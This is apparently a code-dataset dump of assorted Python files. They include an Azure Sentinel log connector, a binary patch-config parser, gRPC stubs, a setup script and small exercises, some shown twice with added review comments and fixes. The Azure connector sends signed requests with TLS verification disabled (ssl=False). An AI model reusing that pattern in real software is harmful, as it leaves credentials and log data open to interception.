] | 12 | 2021-05-11T07:56:50.000Z | 2022-02-11T03:44:01.000Z | import datetime
import logging
import json
import hashlib
import hmac
import base64
import aiohttp
import asyncio
from collections import deque
| 41.733945 | 158 | 0.625852 | import datetime
import logging
import json
import hashlib
import hmac
import base64
import aiohttp
import asyncio
from collections import deque
class AzureSentinelConnectorAsync:
    """
    Asynchronously batches events and posts them to the Azure Monitor
    (Log Analytics) HTTP Data Collector API.

    Events accumulate in an internal queue; once ``queue_size`` events are
    buffered they are sent in one POST, split further whenever a serialized
    payload would reach ``queue_size_bytes``. Call :meth:`flush` once at the
    end to send any remainder.
    """
    def __init__(self, session: aiohttp.ClientSession, log_analytics_uri, workspace_id, shared_key, log_type, queue_size=1000, queue_size_bytes=25 * (2**20)):
        # queue_size_bytes defaults to 25 MiB; NOTE(review): presumably kept
        # under the Data Collector API per-post size limit — confirm against
        # current service limits.
        self.log_analytics_uri = log_analytics_uri
        self.workspace_id = workspace_id
        self.shared_key = shared_key
        self.log_type = log_type
        self.queue_size = queue_size
        self.queue_size_bytes = queue_size_bytes
        self._queue = deque()
        # Counters of events confirmed sent / permanently failed.
        self.successfull_sent_events_number = 0
        self.failed_sent_events_number = 0
        # Lock guards the queue against concurrent send() coroutines.
        self.lock = asyncio.Lock()
        self.session = session
    async def send(self, event):
        """Queue one event; flush a full batch outside the lock."""
        events = None
        async with self.lock:
            self._queue.append(event)
            if len(self._queue) >= self.queue_size:
                events = list(self._queue)
                self._queue.clear()
        if events:
            await self._flush(events)
    async def flush(self):
        """Send whatever is currently queued.

        Note: the queue is NOT cleared here, so calling flush() twice would
        resend the same events — intended to be called once at shutdown.
        """
        await self._flush(list(self._queue))
    async def _flush(self, data: list):
        # Split oversized payloads, then post all chunks concurrently.
        if data:
            data = self._split_big_request(data)
            await asyncio.gather(*[self._post_data(self.session, self.workspace_id, self.shared_key, d, self.log_type) for d in data])
    def _build_signature(self, workspace_id, shared_key, date, content_length, method, content_type, resource):
        """Build the SharedKey HMAC-SHA256 Authorization header value
        required by the Data Collector API."""
        x_headers = 'x-ms-date:' + date
        string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
        bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
        decoded_key = base64.b64decode(shared_key)
        encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
        authorization = "SharedKey {}:{}".format(workspace_id, encoded_hash)
        return authorization
    async def _post_data(self, session: aiohttp.ClientSession, workspace_id, shared_key, body, log_type):
        """POST one batch, retrying up to 3 attempts with linear backoff;
        updates the success/failure counters and re-raises on final failure."""
        logging.debug('Start sending data to sentinel')
        events_number = len(body)
        body = json.dumps(body)
        method = 'POST'
        content_type = 'application/json'
        resource = '/api/logs'
        # Signature input requires the RFC 1123 date also sent in x-ms-date.
        rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
        content_length = len(body)
        signature = self._build_signature(workspace_id, shared_key, rfc1123date, content_length, method, content_type, resource)
        uri = self.log_analytics_uri + resource + '?api-version=2016-04-01'
        headers = {
            'content-type': content_type,
            'Authorization': signature,
            'Log-Type': log_type,
            'x-ms-date': rfc1123date
        }
        try_number = 1
        while True:
            try:
                # NOTE(review): logs very small payloads verbatim — looks
                # like a leftover debugging aid; confirm before relying on it.
                if len(body) < 10:
                    logging.info(body)
                await self._make_request(session, uri, body, headers)
            except Exception as err:
                if try_number < 3:
                    logging.warning('Error while sending data to Azure Sentinel. Try number: {}. Trying one more time. {}'.format(try_number, err))
                    # Linear backoff: wait 1s after the 1st failure, 2s after
                    # the 2nd.
                    await asyncio.sleep(try_number)
                    try_number += 1
                else:
                    logging.error(str(err))
                    self.failed_sent_events_number += events_number
                    raise err
            else:
                logging.debug('{} events have been successfully sent to Azure Sentinel'.format(events_number))
                self.successfull_sent_events_number += events_number
                break
    async def _make_request(self, session, uri, body, headers):
        # Any non-2xx status is surfaced as an exception for the retry loop.
        async with session.post(uri, data=body, headers=headers, ssl=False) as response:
            if not (200 <= response.status <= 299):
                raise Exception("Error during sending events to Azure Sentinel. Response code: {}".format(response.status))
    def _check_size(self, queue):
        """Return True when the JSON-serialized batch fits the byte budget."""
        data_bytes_len = len(json.dumps(queue).encode())
        return data_bytes_len < self.queue_size_bytes
    def _split_big_request(self, queue):
        """Recursively halve the batch until every chunk serializes below
        queue_size_bytes; returns a list of chunks."""
        if self._check_size(queue):
            return [queue]
        else:
            middle = int(len(queue) / 2)
            queues_list = [queue[:middle], queue[middle:]]
            return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
| 4,125 | 13 | 265 |
18bb3bc7809f2da3e09891859e20660934914e96 | 1,788 | py | Python | ebp/config.py | ttimasdf/ebp | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 4 | 2018-01-29T09:13:19.000Z | 2021-08-10T06:58:08.000Z | ebp/config.py | ttimasdf/uni-patcher | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 2 | 2017-07-11T13:30:48.000Z | 2020-06-01T07:15:22.000Z | ebp/config.py | ttimasdf/uni-patcher | 994e3f5d40446098b02491f6b6449cb705397d95 | [
"Apache-2.0"
] | 1 | 2020-06-01T07:01:17.000Z | 2020-06-01T07:01:17.000Z | import configparser
BACKUP_SUFFIX = ".bak"
_parser = configparser.ConfigParser()
def parse_file(filename):
    """Parse a patch-definition INI file and return the patch description.

    Returns a dict with:
      * ``metadata`` -- name/description/congratulation strings (empty dict
        when the file has no ``[metadata]`` section);
      * ``files``    -- one entry per ``[patch:<name>]`` section describing
        the relative and absolute byte patches to apply.
    """
    _parser.read(filename)
    result = {'files': {}}
    result['metadata'] = {
        "name": _parser['metadata']['name'],
        "description": _parser['metadata']['description'],
        "congratulation": _parser['metadata']['congratulation'],
    } if 'metadata' in _parser else {}
    for patch_name in _parser.sections():
        # Only '[patch:...]' sections describe patches; skip everything else.
        if not patch_name.startswith('patch:'):
            continue
        s = _parser[patch_name]
        patch_name = patch_name[6:]  # drop the 'patch:' prefix
        this = {
            "unsign": s.getboolean('unsign', False),
            "file": s['file'],
            "relatives": [],
            "absolutes": [],
        }
        if 'relatives' in s:
            # Each record: src_hex,dst_hex[,range,fg_hex]... -- comma separated.
            # NOTE(review): _str2range is not defined in this copy of the
            # module; it is expected to map 'a~b' / 'n' strings to ranges.
            for line in s['relatives'].strip('\n, ').split('\n'):
                line = line.split(',')
                this['relatives'].append({
                    "src": bytes.fromhex(line[0]),
                    "dst": bytes.fromhex(line[1]),
                    "fg": dict(zip(
                        (_str2range(i) for i in line[2::2]),
                        (bytes.fromhex(i) for i in line[3::2]))),
                })
        if 'absolutes' in s:
            for line in s['absolutes'].strip('\n, ').split('\n'):
                # NOTE(review): unlike the relatives branch, 'line' is NOT
                # split on ',' here, so line[0]/line[1]/line[2] index single
                # characters (and bytes.fromhex of one char raises
                # ValueError). Looks like a bug -- confirm the record format.
                this['absolutes'].append({
                    "pos": int(line[0]),
                    "src": bytes.fromhex(line[1]),
                    "dst": bytes.fromhex(line[2]),
                })
        result['files'][patch_name] = this
    return result
| 30.305085 | 65 | 0.480984 | import configparser
BACKUP_SUFFIX = ".bak"
_parser = configparser.ConfigParser()
def parse_file(filename):
    """Parse a patch-definition INI file and return the patch description.

    Returns a dict with:
      * ``metadata`` -- name/description/congratulation strings (empty dict
        when the file has no ``[metadata]`` section);
      * ``files``    -- one entry per ``[patch:<name>]`` section describing
        the relative and absolute byte patches to apply.
    """
    _parser.read(filename)
    result = {'files': {}}
    result['metadata'] = {
        "name": _parser['metadata']['name'],
        "description": _parser['metadata']['description'],
        "congratulation": _parser['metadata']['congratulation'],
    } if 'metadata' in _parser else {}
    for patch_name in _parser.sections():
        # Only '[patch:...]' sections describe patches; skip everything else.
        if not patch_name.startswith('patch:'):
            continue
        s = _parser[patch_name]
        patch_name = patch_name[6:]  # drop the 'patch:' prefix
        this = {
            "unsign": s.getboolean('unsign', False),
            "file": s['file'],
            "relatives": [],
            "absolutes": [],
        }
        if 'relatives' in s:
            # Each record: src_hex,dst_hex[,range,fg_hex]... -- comma separated.
            for line in s['relatives'].strip('\n, ').split('\n'):
                line = line.split(',')
                this['relatives'].append({
                    "src": bytes.fromhex(line[0]),
                    "dst": bytes.fromhex(line[1]),
                    "fg": dict(zip(
                        (_str2range(i) for i in line[2::2]),
                        (bytes.fromhex(i) for i in line[3::2]))),
                })
        if 'absolutes' in s:
            # Each record: pos,src_hex,dst_hex -- comma separated.
            for line in s['absolutes'].strip('\n, ').split('\n'):
                # BUG FIX: the record was previously indexed without being
                # split on ',', so line[0]/line[1]/line[2] picked single
                # characters (and bytes.fromhex() of a 1-char string raises
                # ValueError). Split into fields first, mirroring the
                # relatives branch above.
                line = line.split(',')
                this['absolutes'].append({
                    "pos": int(line[0]),
                    "src": bytes.fromhex(line[1]),
                    "dst": bytes.fromhex(line[2]),
                })
        result['files'][patch_name] = this
    return result
def _str2range(s):
    """Turn 'a~b' into the tuple (a, b) and a bare number 'n' into (n, n)."""
    if '~' not in s:
        return (int(s), int(s))
    start, end = s.split('~', maxsplit=1)
    return (int(start), int(end))
| 132 | 0 | 23 |
5859c97e18fc8e9f8c17c8655f9db9df190cf387 | 467 | py | Python | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | python/5.py | kylekanos/project-euler-1 | af7089356a4cea90f8ef331cfdc65e696def6140 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2019-09-17T00:55:58.000Z | 2019-09-17T00:55:58.000Z | #!/usr/bin/env python
# for i from 2 to 20
#   compute prime factorization of i.
#   use largest multiplicity in any
#   prime factor seen thus far
# (Project Euler 5: smallest number evenly divisible by all of 1..20.
#  Python 2 source: xrange / print statement / builtin reduce.)
facs = {}
for i in xrange(2,21):
    # NOTE(review): factorize() is not defined in this copy of the script --
    # it must return a {prime: exponent} dict; confirm it is provided elsewhere.
    f = factorize(i)
    for j in f:
        facs[j] = max(facs.get(j,0),f[j])
# LCM(2..20) = product of each prime raised to its maximum exponent.
print reduce(lambda x,y: x*y, (i**facs[i] for i in facs))
| 19.458333 | 57 | 0.537473 | #!/usr/bin/env python
# for i from 2 to 20
# compute prime factorization of i.
# use largest multiplicity in any
# prime factor seen thus far
def factorize(n):
    """Return the prime factorization of n as a {prime: exponent} dict."""
    factors = {}
    candidate = 2
    # Trial division: strip each candidate out completely before advancing,
    # so only primes ever appear as keys in the result.
    while n >= candidate:
        while n % candidate == 0:
            n //= candidate
            factors[candidate] = factors.get(candidate, 0) + 1
        candidate += 1
    return factors
# For every prime, keep the largest exponent needed by any i in 2..20.
facs = {}
for i in xrange(2,21):
    f = factorize(i)
    for j in f:
        facs[j] = max(facs.get(j,0),f[j])
# Smallest number divisible by all of 2..20 = product of primes**max-exponent.
# (Python 2 source: xrange / print statement / builtin reduce.)
print reduce(lambda x,y: x*y, (i**facs[i] for i in facs))
| 130 | 0 | 23 |
a88f21775f07697d182770e156e849a1936e4122 | 9,973 | py | Python | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 9 | 2021-03-24T10:40:05.000Z | 2022-01-22T08:55:25.000Z | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 23 | 2020-11-26T01:29:48.000Z | 2022-03-01T00:33:34.000Z | python/onos/config/diags/__init__.py | tomikazi/onos-api | fb349a6f26c8453707101aa27712bf16630191d6 | [
"Apache-2.0"
] | 29 | 2020-11-25T17:25:45.000Z | 2022-03-30T05:54:15.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: onos/config/diags/diags.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncIterator, Dict
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
# Generated from onos/config/diags/diags.proto (betterproto); values must
# stay in sync with the protobuf enum -- do not renumber.
class Type(betterproto.Enum):
    """Change (Network or Device) event type"""

    # NONE indicates this response does not represent a modification of the
    # Change
    NONE = 0
    # ADDED is an event which occurs when a Change is added to the topology
    ADDED = 1
    # UPDATED is an event which occurs when a Change is updated
    UPDATED = 2
    # REMOVED is an event which occurs when a Change is removed from the
    # configuration
    REMOVED = 3
# Generated protobuf message (betterproto); field tags must match diags.proto.
@dataclass(eq=False, repr=False)
class OpStateRequest(betterproto.Message):
    """
    OpStateRequest is a message for specifying GetOpState query parameters.
    """

    # The request is always in the context of a Device ID. If the device does not
    # exist or is disconnected an error will be returned.
    device_id: str = betterproto.string_field(1)
    # subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
    # REMOVE) that occur after all paths for the device have been streamed to the
    # client
    subscribe: bool = betterproto.bool_field(2)
# FIX: a duplicated @dataclass(eq=False, repr=False) decorator (leftover from
# a class removed above this point) was applied twice to this class; the
# stray copy has been removed so dataclass() processes the class only once.
@dataclass(eq=False, repr=False)
class ListNetworkChangeRequest(betterproto.Message):
    """
    ListNetworkChangeRequest requests a stream of changes and updates to them
    By default, the request requests a stream of all changes that are present
    in the topology when the request is received by the service. However, if
    `subscribe` is `true`, the stream will remain open after all changes have
    been sent and events that occur following the last changes will be streamed
    to the client until the stream is closed. If "withoutReplay" is true then
    only changes that happen after the call will be returned
    """

    # subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
    # REMOVE) that occur after all devices have been streamed to the client
    subscribe: bool = betterproto.bool_field(1)
    # option to specify a specific network change - if blank or '*' then select
    # all Can support `*` (match many chars) or '?' (match one char) as wildcard
    changeid: str = betterproto.string_field(2)
    # option to request only changes that happen after the call
    without_replay: bool = betterproto.bool_field(3)
# Generated protobuf message (betterproto); field tags must match diags.proto.
@dataclass(eq=False, repr=False)
class ListNetworkChangeResponse(betterproto.Message):
    """ListNetworkChangeResponse carries a single network change event"""

    # change is the network change on which the event occurred
    change: "_change_network__.NetworkChange" = betterproto.message_field(1)
    # type is a qualification of the type of change being made
    type: "Type" = betterproto.enum_field(2)
class ListDeviceChangeRequest(betterproto.Message):
"""
ListDeviceChangeRequest requests a stream of changes and updates to them By
default, the request requests a stream of all changes that are present in
the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific device change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
device_id: str = betterproto.string_field(2)
# device_version is an optional device version
device_version: str = betterproto.string_field(3)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(4)
# Generated protobuf message (betterproto); field tags must match diags.proto.
@dataclass(eq=False, repr=False)
class ListDeviceChangeResponse(betterproto.Message):
    """ListDeviceChangeResponse carries a single network change event"""

    # change is the device change on which the event occurred
    change: "_change_device__.DeviceChange" = betterproto.message_field(1)
    # type is a qualification of the type of change being made
    type: "Type" = betterproto.enum_field(2)
from .. import admin as _admin__
from ..change import device as _change_device__
from ..change import network as _change_network__
| 36.937037 | 89 | 0.682242 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: onos/config/diags/diags.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncIterator, Dict
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
class Type(betterproto.Enum):
"""Change (Network or Device) event type"""
# NONE indicates this response does not represent a modification of the
# Change
NONE = 0
# ADDED is an event which occurs when a Change is added to the topology
ADDED = 1
# UPDATED is an event which occurs when a Change is updated
UPDATED = 2
# REMOVED is an event which occurs when a Change is removed from the
# configuration
REMOVED = 3
@dataclass(eq=False, repr=False)
class OpStateRequest(betterproto.Message):
"""
OpStateRequest is a message for specifying GetOpState query parameters.
"""
# The request is always in the context of a Device ID. If the device does not
# exist or is disconnected an error will be returned.
device_id: str = betterproto.string_field(1)
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all paths for the device have been streamed to the
# client
subscribe: bool = betterproto.bool_field(2)
# Generated protobuf message (betterproto); field tags must match diags.proto.
@dataclass(eq=False, repr=False)
class OpStateResponse(betterproto.Message):
    """OpStateResponse carries one operational-state event streamed by GetOpState."""

    # type is the type of the event
    type: "_admin__.Type" = betterproto.enum_field(1)
    # device is the device on which the event occurred
    pathvalue: "_change_device__.PathValue" = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class ListNetworkChangeRequest(betterproto.Message):
"""
ListNetworkChangeRequest requests a stream of changes and updates to them
By default, the request requests a stream of all changes that are present
in the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific network change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
changeid: str = betterproto.string_field(2)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ListNetworkChangeResponse(betterproto.Message):
"""ListNetworkChangeResponse carries a single network change event"""
# change is the network change on which the event occurred
change: "_change_network__.NetworkChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class ListDeviceChangeRequest(betterproto.Message):
"""
ListDeviceChangeRequest requests a stream of changes and updates to them By
default, the request requests a stream of all changes that are present in
the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific device change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
device_id: str = betterproto.string_field(2)
# device_version is an optional device version
device_version: str = betterproto.string_field(3)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(4)
@dataclass(eq=False, repr=False)
class ListDeviceChangeResponse(betterproto.Message):
"""ListDeviceChangeResponse carries a single network change event"""
# change is the device change on which the event occurred
change: "_change_device__.DeviceChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
class ChangeServiceStub(betterproto.ServiceStub):
async def list_network_changes(
self,
*,
subscribe: bool = False,
changeid: str = "",
without_replay: bool = False,
) -> AsyncIterator["ListNetworkChangeResponse"]:
request = ListNetworkChangeRequest()
request.subscribe = subscribe
request.changeid = changeid
request.without_replay = without_replay
async for response in self._unary_stream(
"/onos.config.diags.ChangeService/ListNetworkChanges",
request,
ListNetworkChangeResponse,
):
yield response
async def list_device_changes(
self,
*,
subscribe: bool = False,
device_id: str = "",
device_version: str = "",
without_replay: bool = False,
) -> AsyncIterator["ListDeviceChangeResponse"]:
request = ListDeviceChangeRequest()
request.subscribe = subscribe
request.device_id = device_id
request.device_version = device_version
request.without_replay = without_replay
async for response in self._unary_stream(
"/onos.config.diags.ChangeService/ListDeviceChanges",
request,
ListDeviceChangeResponse,
):
yield response
class OpStateDiagsStub(betterproto.ServiceStub):
async def get_op_state(
self, *, device_id: str = "", subscribe: bool = False
) -> AsyncIterator["OpStateResponse"]:
request = OpStateRequest()
request.device_id = device_id
request.subscribe = subscribe
async for response in self._unary_stream(
"/onos.config.diags.OpStateDiags/GetOpState",
request,
OpStateResponse,
):
yield response
class ChangeServiceBase(ServiceBase):
async def list_network_changes(
self, subscribe: bool, changeid: str, without_replay: bool
) -> AsyncIterator["ListNetworkChangeResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def list_device_changes(
self, subscribe: bool, device_id: str, device_version: str, without_replay: bool
) -> AsyncIterator["ListDeviceChangeResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_list_network_changes(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"subscribe": request.subscribe,
"changeid": request.changeid,
"without_replay": request.without_replay,
}
await self._call_rpc_handler_server_stream(
self.list_network_changes,
stream,
request_kwargs,
)
async def __rpc_list_device_changes(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"subscribe": request.subscribe,
"device_id": request.device_id,
"device_version": request.device_version,
"without_replay": request.without_replay,
}
await self._call_rpc_handler_server_stream(
self.list_device_changes,
stream,
request_kwargs,
)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/onos.config.diags.ChangeService/ListNetworkChanges": grpclib.const.Handler(
self.__rpc_list_network_changes,
grpclib.const.Cardinality.UNARY_STREAM,
ListNetworkChangeRequest,
ListNetworkChangeResponse,
),
"/onos.config.diags.ChangeService/ListDeviceChanges": grpclib.const.Handler(
self.__rpc_list_device_changes,
grpclib.const.Cardinality.UNARY_STREAM,
ListDeviceChangeRequest,
ListDeviceChangeResponse,
),
}
class OpStateDiagsBase(ServiceBase):
async def get_op_state(
self, device_id: str, subscribe: bool
) -> AsyncIterator["OpStateResponse"]:
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_get_op_state(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"device_id": request.device_id,
"subscribe": request.subscribe,
}
await self._call_rpc_handler_server_stream(
self.get_op_state,
stream,
request_kwargs,
)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/onos.config.diags.OpStateDiags/GetOpState": grpclib.const.Handler(
self.__rpc_get_op_state,
grpclib.const.Cardinality.UNARY_STREAM,
OpStateRequest,
OpStateResponse,
),
}
from .. import admin as _admin__
from ..change import device as _change_device__
from ..change import network as _change_network__
| 4,476 | 328 | 407 |
6258be964f0d0f522fe9c811d890fe76ef476459 | 1,551 | py | Python | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | setup.py | fusionbox/django-reversion | a7899ead7348dcd45eb34aa3f0bbfbc9a3c5596b | [
"BSD-3-Clause"
] | null | null | null | import sys
# Make src/reversion importable so the package version can be read below.
sys.path.insert(0, 'src/reversion')

from distutils.core import setup
from version import __version__

# Load in babel support, if available.
try:
    from babel.messages import frontend as babel
    # Wire Babel's i18n catalog commands into ``python setup.py <cmd>``.
    cmdclass = {"compile_catalog": babel.compile_catalog,
                "extract_messages": babel.extract_messages,
                "init_catalog": babel.init_catalog,
                "update_catalog": babel.update_catalog,}
except ImportError:
    # Babel is optional: without it the i18n commands are simply unavailable.
    cmdclass = {}

setup(name="django-reversion",
      version='.'.join(str(x) for x in __version__),
      license="BSD",
      description="An extension to the Django web framework that provides comprehensive version control facilities",
      long_description=open("README.markdown").read(),
      author="Dave Hall",
      author_email="dave@etianen.com",
      url="http://github.com/etianen/django-reversion",
      zip_safe=False,
      packages=["reversion", "reversion.management", "reversion.management.commands", "reversion.migrations"],
      package_dir={"": "src"},
      package_data = {"reversion": ["locale/*/LC_MESSAGES/django.*", "templates/reversion/*.html"]},
      cmdclass = cmdclass,
      classifiers=["Development Status :: 5 - Production/Stable",
                   "Environment :: Web Environment",
                   "Intended Audience :: Developers",
                   "License :: OSI Approved :: BSD License",
                   "Operating System :: OS Independent",
                   "Programming Language :: Python",
                   "Framework :: Django",])
| 41.918919 | 116 | 0.636364 | import sys
sys.path.insert(0, 'src/reversion')
from distutils.core import setup
from version import __version__
# Load in babel support, if available.
try:
from babel.messages import frontend as babel
cmdclass = {"compile_catalog": babel.compile_catalog,
"extract_messages": babel.extract_messages,
"init_catalog": babel.init_catalog,
"update_catalog": babel.update_catalog,}
except ImportError:
cmdclass = {}
setup(name="django-reversion",
version='.'.join(str(x) for x in __version__),
license="BSD",
description="An extension to the Django web framework that provides comprehensive version control facilities",
long_description=open("README.markdown").read(),
author="Dave Hall",
author_email="dave@etianen.com",
url="http://github.com/etianen/django-reversion",
zip_safe=False,
packages=["reversion", "reversion.management", "reversion.management.commands", "reversion.migrations"],
package_dir={"": "src"},
package_data = {"reversion": ["locale/*/LC_MESSAGES/django.*", "templates/reversion/*.html"]},
cmdclass = cmdclass,
classifiers=["Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Framework :: Django",])
| 0 | 0 | 0 |
c23556b460ef2746f72d4cabfc3efd0e0a592a70 | 634 | py | Python | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | password.py | nziokaivy/password_locker | 9406dda22dea807c1157b4a4168dc4a943eff3e0 | [
"MIT"
] | null | null | null | import random
class Account_user:
    """
    Represents a password-locker account holder and keeps a class-wide
    registry of every saved user.
    """

    # Shared registry of all Account_user objects that called save_user().
    users_list = []

    def __init__(self, first_name, password):
        '''
        Create a new account user.

        Args:
            first_name : main account user name
            password : main account password
        '''
        self.first_name = first_name
        self.password = password

    def save_user(self):
        '''
        Append this user object to the shared users_list registry.
        '''
        Account_user.users_list.append(self)
| 19.8125 | 79 | 0.594637 | import random
class Account_user:
"""
Class to create new user accounts and save information
"""
users_list = []
def __init__(self,first_name,password):
'''
Method that helps us define properties that each user account will have
Args:
first_name : main account user name
password : main account password
'''
self.first_name = first_name
self.password = password
def save_user(self):
'''
Method to save new user account objects into users_list
'''
Account_user.users_list.append(self)
| 0 | 0 | 0 |
ac8bbc8720f9c64445fe9a7d755e4c38fead6d25 | 14,429 | py | Python | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | 5 | 2016-03-18T15:12:04.000Z | 2019-01-28T20:18:24.000Z | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | null | null | null | plot.py | nsg-ethz/SDNRacer | 33353177998947580e879941f05862f0173a0c48 | [
"Apache-2.0"
] | 1 | 2019-11-02T22:04:48.000Z | 2019-11-02T22:04:48.000Z | #!/usr/bin/env python
import argparse
import csv
import glob
import os
import itertools
from pylab import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from asyncore import loop
# Values we care about: the summary.csv metrics this script knows how to plot.
keys = [
    'num_read',
    'num_writes',
    'num_ops',
    'num_rw_time_edges',
    'num_ww_time_edges',
    'num_time_edges',
    'num_harmful',
    'num_commute',
    'num_races',
    'num_covered',
    'num_per_pkt_races',
    'num_per_pkt_inconsistent',
    'num_per_pkt_inconsistent_covered',
    'num_per_pkt_entry_version_race',
    'num_per_pkt_inconsistent_no_repeat',
    'total_time_sec',
    'load_time_sec',
    'detect_races_time_sec',
    'extract_traces_time_sec',
    'find_reactive_cmds_time_sec',
    'find_proactive_cmds_time_sec',
    'find_covered_races_time',
    'per_packet_inconsistent_time_sec',
    'find_inconsistent_update_time_sec',
]

# Per-packet consistency metrics (subset of `keys`) plotted together.
per_pkt_consistency = ['num_per_pkt_races', 'num_per_pkt_inconsistent',
                       'num_per_pkt_inconsistent_covered',
                       'num_per_pkt_entry_version_race']

# Column-name prefixes distinguishing the two result variants in summary.csv.
prefixes = ['True-', 'False-']

# Map timing labels ('0'..'10', 'inf') to sortable integers.
timing_values = {str(i): i for i in range(11)}
timing_values['inf'] = 11  # hack for plots
sorted_timing_values = sorted(timing_values.items(), key=lambda x: x[1])

# http://matplotlib.org/api/markers_api.html
markers = ['x', '+', '.', 'o', '*',
           # ',',
           '1', '2', '3', '4', '8',
           '<', '>', 'D', 'H', '^',
           '_', 'd', 'h', 'p', 's',
           'v', '|',
           0, 1, 2, 3, 4, 5, 6, 7]
def get_correct_alt_barr_prefix(name):
    """
    Whether to use alt-barr results or not. Should be True for purely reactive controllers, and False for proactive controllers that use barriers.
    """
    # True  -> purely reactive controller (use the alt-barr results)
    # False -> proactive controller that uses barriers
    prefix_for_name = {
        'trace_floodlight_learningswitch-StarTopology2-steps200': True,
        'trace_floodlight_learningswitch-StarTopology4-steps200': True,
        'trace_floodlight_learningswitch-StarTopology8-steps200': True,
        'trace_floodlight_learningswitch-BinaryLeafTreeTopology1-steps200': True,
        'trace_floodlight_learningswitch-BinaryLeafTreeTopology2-steps200': True,
        'trace_floodlight_forwarding-StarTopology2-steps200': True,
        'trace_floodlight_forwarding-StarTopology4-steps200': True,
        'trace_floodlight_forwarding-StarTopology8-steps200': True,
        'trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200': True,
        'trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200': True,
        'trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps200': False,
        'trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps200': False,
        # consistent, barriers
